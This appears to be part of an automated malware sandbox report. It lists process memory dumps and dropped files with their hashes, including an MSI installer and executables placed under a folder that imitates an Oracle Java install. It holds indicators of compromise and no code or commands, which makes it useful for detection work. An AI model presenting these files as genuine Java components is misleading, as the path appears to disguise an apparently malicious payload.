memory/2472-86-0x00000000057A0000-0x00000000057C2000-memory.dmp
memory/5080-88-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/5080-87-0x00000000055E0000-0x0000000005646000-memory.dmp
memory/5080-89-0x0000000005870000-0x0000000005BC4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rixc2b3o.31x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2472-117-0x0000000006870000-0x000000000688E000-memory.dmp
memory/2472-118-0x0000000006890000-0x00000000068DC000-memory.dmp
memory/2472-121-0x0000000070740000-0x000000007078C000-memory.dmp
memory/5080-119-0x0000000006E90000-0x0000000006EC2000-memory.dmp
memory/5080-120-0x0000000070740000-0x000000007078C000-memory.dmp
memory/2472-140-0x0000000006DF0000-0x0000000006E0E000-memory.dmp
memory/5080-141-0x00000000070D0000-0x0000000007173000-memory.dmp
memory/1800-142-0x0000000070740000-0x000000007078C000-memory.dmp
memory/5080-152-0x00000000071F0000-0x000000000720A000-memory.dmp
memory/1800-153-0x0000000008040000-0x00000000086BA000-memory.dmp
memory/5080-154-0x0000000007260000-0x000000000726A000-memory.dmp
memory/1800-155-0x0000000007C90000-0x0000000007D26000-memory.dmp
memory/5080-157-0x00000000073F0000-0x0000000007401000-memory.dmp
memory/1800-156-0x0000000007C00000-0x0000000007C11000-memory.dmp
memory/2472-158-0x0000000007DC0000-0x0000000007DCE000-memory.dmp
memory/5080-159-0x0000000007430000-0x0000000007444000-memory.dmp
memory/5080-160-0x0000000007530000-0x000000000754A000-memory.dmp
memory/1800-161-0x0000000007C80000-0x0000000007C88000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88b7e09ad647110c38f12c0d75b4f5c8 |
| SHA1 | b2e188fd69562cf30374f3d8e4b5f56ff3cd9ca5 |
| SHA256 | 68262db03eb3905e7225b3863eeef9307c5a81a656053706bcca06d8658be296 |
| SHA512 | f9a933492b047d14dcab6a9bd6864b668b36c2ef133bed5ff47ed5b9d59745b172293b96736c71860f64aafd9f44ce1fcffd1ed5b0b7b27b97bd0f05f56192e2 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
| MD5 | 96b62cfb83cf0e9790a3ef939173ee31 |
| SHA1 | 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1 |
| SHA256 | 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23 |
| SHA512 | d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b |
memory/1672-192-0x0000000005C10000-0x0000000005F64000-memory.dmp
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
| MD5 | a3ba8128253c2f6bf043d636100d62de |
| SHA1 | f47a211b1d09d75ff820d2c2e2fd9fa0338562a5 |
| SHA256 | 599f9c72db7ba72b2d13c222f9121d7b564fbd0b401be44bd05a660e43d93bce |
| SHA512 | 89f2d39a507a40bbf096fd10816b901c472ce5b184b7de70d9d80c97f42db5029e877201df7abd828c4f475d279617d4e24b673608136659a9602cf14385f5ae |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
| MD5 | e7fcab954f116c8bb4b006145c20dd23 |
| SHA1 | 91ee70a33ab12618f0f0ec229de4583d9aa52a8a |
| SHA256 | e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2 |
| SHA512 | d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9 |
memory/4600-280-0x0000000006300000-0x000000000634C000-memory.dmp
memory/548-335-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp
memory/4600-336-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4600-346-0x00000000074A0000-0x0000000007543000-memory.dmp
memory/1672-347-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/932-367-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/5016-357-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3140-377-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4056-387-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4556-397-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3588-417-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3580-407-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3460-427-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4328-437-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4600-447-0x00000000077E0000-0x00000000077F1000-memory.dmp
memory/3812-448-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4764-458-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/3484-468-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4600-478-0x0000000007820000-0x0000000007834000-memory.dmp
memory/4420-479-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/4016-489-0x00000000700D0000-0x000000007011C000-memory.dmp
memory/2128-499-0x00000000700D0000-0x000000007011C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 88e30f8e14dda84b7e420941eb5cfd08 |
| SHA1 | 999c1236d43e908c42e35fdad6a0cbeca0b5c87a |
| SHA256 | b9d45f7479e06d6dcb02482467726fbc43aa738e0605ccc1bd428717fd27c464 |
| SHA512 | a009d8266681fd55714e0fe777f9ca3f4be5c0223971deb886b80582c7398231d22bacd2fd970b3348484b986a081ffa839fdb7454a96a9c6f0fb01ca4eef709 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d835855d729ed0ea8515fc7680f8a68b |
| SHA1 | 5fe84e9ca05c87c5fa0584498a95c3ab9234e446 |
| SHA256 | 767ae12a1249e356d5597ac96c80c4df7bcf696214dca6536e0d750c5ce532c3 |
| SHA512 | 8af7c6179595fd252067f2de18ec4823062951128590a44769477a880c0e14334dc394be85e6ec2ead5bf43936aec34f81447b542081a99a1a32a42082ffe1a3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bc1847cefc1c9c27c95ecd59857d21ac |
| SHA1 | 0c756ee8194aca441ef3d2d24017fa9f20176cb9 |
| SHA256 | 76d940812fbb29a2153bdcf5ca23b6ce4bccca7a0697603823ee32d916f3d9d5 |
| SHA512 | d9110155f8f55a3e4bee18ea12b97a15cfec12fb38ab6c643f36d370e0e123811366476b1217b82b248e5ccc0f5bee98376ca33afd2693d9d34dda3ba5f5c9d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b98526874008796c30f2b4d0d16e0351 |
| SHA1 | 2a4707b0c18155f53c773c0fba8fab4d323c2c6a |
| SHA256 | f62c5b49cbe710a5ef1ccd22ef8a42b380eb2588ae58088ba6fbb1360001ea5f |
| SHA512 | 36f58b3729a07f5cab2f3a2396fdd2fba732a12bc7136104d41d5b6a295b80684259278f891182c9096c84ab095977d1d082e685dfd0d7099dce02cc92ce3ac6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e49232bfd9248f8c4bb9291af3127f26 |
| SHA1 | dee61b7b2713003137e0db037c5c49494c6c4272 |
| SHA256 | 5af059663a12adb9b84cb82ef4520b8b77cce39e50d73bfbe0325babe79d16b8 |
| SHA512 | a248b49b18c26b614313f94d067cd61965dadb105163f5812557aac467ba39752d629b24c6493c914c7a463a1d23fbdaa331ff4a1d798974a51ac30dc274a0f2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 90de5738b9e946ce68a2d67e66b45f58 |
| SHA1 | 15ab9e70b2da772985ba674513ff40251b62799e |
| SHA256 | 227fc3c051f3b3dd07bde413f195d701b63a627965c2003d55b8d3ddef950bdc |
| SHA512 | 98bbc30ab336b5e1e85ae108e518b3e598859f1033a3a8ae07340fb14f89af02cf52e9a06d281341eaebe47ff6ea16d50e35b306fb398684a3788ae97bf2299c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 92d7d23566905f49a00fe9bd39dd8426 |
| SHA1 | 83cfc3f1449b54d21cbdd394723ca4e6a4b6a355 |
| SHA256 | 9eb45000e73503d1ba9b2af51e5216f82b92321b03c2150b5a7f85fbd6f8ef3f |
| SHA512 | c47d257a916028a2e137446ae3429337eafc69056504006cb0b9d298feedd19b974eb2c88f02e17dc2119d6bd0f2c1f9bc11d8a022875a9c573f344dcfa73d3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6eef5e45356ecff70dbfaf70af0c41a4 |
| SHA1 | e7bfa64975d94696213799d7aa630739ef9fed68 |
| SHA256 | 683670fb625bcdd08dbfde6ed96440363959a632bf6249b3853de37620bc5555 |
| SHA512 | d00498eb7b198bfa0a1528ad8572b46839413681516a3929929a7af122b870d115dd49edc1d77cf19a95683ea6a0e1cacdeabebecfaec0ac105928886874cab0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f853d6d0fe869dc52d9c5d7873c8219c |
| SHA1 | 2805083671f9bc4453de07781d737a5bf45e60e5 |
| SHA256 | 66945f8b460f9025d5f58ca90bd8b976d41c2f42cba58845feaa78643cefbbec |
| SHA512 | 4fcf31aa3a393d9c0ee7dc08bfa3c62bf0862bea1f88b0f3a2286f5293e9e9ed5eeb9a9896f1251fa641080c6ad918b1d2e4e5c0d21b3cc1b94c0b7ed650bd0e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 82111a2f1b6833e37602df207a7bc189 |
| SHA1 | 19ced181f471d749cc98a303685558bd284155d9 |
| SHA256 | a79ba5594439c89db758b486786fc0420184e5f8ec304407173a5dad80aaea46 |
| SHA512 | b602b8e53b156d157ad288a12c6d5eba950f5907ea76b4fad6952f27867c2a2118c51c501e0ad1f0477dd07842b989435dc676490bea9bafdcbe9359ee77af97 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d63604e13936ee1e7baa922de6e2524f |
| SHA1 | 619478385fb76193a111ea5e2cbda66ea88494bf |
| SHA256 | 705e89249150d5cd31bc3b8f5b59527c4962b575d6dedc6429f2f52e2b9d76fe |
| SHA512 | ce64bf0cf7d2660a6e3b344e7176e74c44c12434fbe35ddf764b6980cf38c0222cb8afca1a44a4b1ad78274f263a5404d219cecebab6a194e5b9a382f568c367 |
C:\Config.Msi\e57762b.rbs
| MD5 | 3064ebd622bb0cec063dfec93c469a92 |
| SHA1 | 5cc25618f16e07a21ff01422bd63fb2d66ef560c |
| SHA256 | de11bf9c53921ba2f588cf9e9808b01761b2a5b03de2dbae238dc04fa7e8a7f2 |
| SHA512 | 322693566aa5ac5afcd1dc0ecb19787df102e86076d84133c1067896fade6c7d0be92bb7b602a1466124ec67faeef267a8ccaadbf93b41b2c7acb0ae690d102b |
C:\Windows\Installer\e57762a.msi
| MD5 | 4c11285fc4be4ffa97a866fbc13bbd83 |
| SHA1 | 67230603c53081c6436658c3e7b90048a61cb5ed |
| SHA256 | f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9 |
| SHA512 | 4f8654d49aa571890473ffb4743dbeee311efbbec09fec307fbcf4803041c976dde0711a72865820edbc5b94487609622adbd9d7694dc8394eee44a5821ef4e1 |
memory/548-551-0x00007FFBF8C90000-0x00007FFBF9110000-memory.dmp